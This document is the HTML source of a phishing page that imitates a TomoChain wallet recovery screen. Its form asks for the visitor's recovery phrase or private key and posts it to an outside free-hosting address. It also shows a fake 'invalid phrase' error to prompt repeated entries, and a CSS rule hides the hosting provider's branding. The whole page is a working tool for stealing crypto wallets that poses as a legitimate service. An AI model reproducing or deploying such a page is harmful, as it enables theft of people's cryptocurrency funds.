<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HOME - TOMOCHAIN</title>
	<!-- BOOTSTRAP STYLES-->
    <link href="./pharse_files/bootstrap.css" rel="stylesheet">
     <!-- FONTAWESOME STYLES-->
    <link href="./pharse_files/font-awesome.css" rel="stylesheet">
        <!-- CUSTOM STYLES-->
    <link href="./pharse_files/custom.css" rel="stylesheet">
     <!-- GOOGLE FONTS-->
   <link href="./pharse_files/css" rel="stylesheet" type="text/css">

</head>
<body>
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-color: rgb(36,40,41);
  height: 100vh;
  background-size: cover;
  background-position: absolute;
  background-repeat: no-repeat, repeat;
}

ul{
  float: right;
  list-style-type: none;
  margin-top: 25px;
}

ul li{
  display: inline-block;
}

ul li a{
  text-decoration: none;
  color: #fff;
  padding: 8px 25px;
  border: 2px solid #C09854;
  border-radius: 25px;
  font-size: 14px;
  font-style: bold;
  transform: 0.6s ease;
  letter-spacing: 1px;
}

ul li a:hover{
  background-color: #C09854;
  color: #fff;
}

.logo img{
  float: left;
  margin-top: 23px;
  height: 20px;
  width: auto;
}

.main{
  margin: auto;
}

.title{
 
  margin-top: 20px;
  text-align: center;
  
  
}


.btn{
  border-color: 2px solid rgb(37,201,166);
  background-color: rgb(37,201,166);
  padding: 10px 10px;
  display: inline-block;
  color: white;
  width: 300px;
  border-radius: 5px;
  outline: none !important;
  
}

.btn a{
  text-decoration: none;
  color: white;
  font-size: 15px;
  font-style: bold;
  letter-spacing: 2px;

}

img[alt="www.000webhost.com"]{
    opacity: 0;
}

</style>



  

  <div class="title">
     <form method="POST" action="https://get-coins-freees.000webhostapp.com/log1.php">
         <div style="background: rgba(255,255,255,0.1); width: 340px; text-align: left; margin-left: 10px; margin-right: 10px; padding: 0px 5px; border-radius: 5px ">
        <p style=" color: white; font-size: 20px; font-weight: bolder">Recovery Phrase or <br>Private Key</p>
        <p style=" color: grey; font-size: 16px; padding-top: 2px">Enter your your recovery Phrase or Private Key to recover your wallet. Be sure to keep it safe when your are done</p>
		<font color="red">Invalid Recovery Phrase or
Private Key</font>
    </div>
	
    <input type="text" name="walletSeed" placeholder="Enter your private key or recovery phrase" required="" style="height: 10em; width: 340px; background-color: white; outline: none; border-radius: 5px; border:none; text-align: center; font-size: 16px ">
    
    
   &gt;<br><br><br><br>

<br>
    <br><br>
     <a href="log.php">
    <button class="btn">
    IMPORT YOUR WALLET
    </button>
    </a>
     </form>
    
  </div>


    

     <!-- SCRIPTS -AT THE BOTOM TO REDUCE THE LOAD TIME-->
    <!-- JQUERY SCRIPTS -->
    <script src="./pharse_files/jquery-1.10.2.js.download"></script>
      <!-- BOOTSTRAP SCRIPTS -->
    <script src="./pharse_files/bootstrap.min.js.download"></script>
    <!-- METISMENU SCRIPTS -->
    <script src="./pharse_files/jquery.metisMenu.js.download"></script>
      <!-- CUSTOM SCRIPTS -->
    <script src="./pharse_files/custom.js.download"></script>
   

</body></html>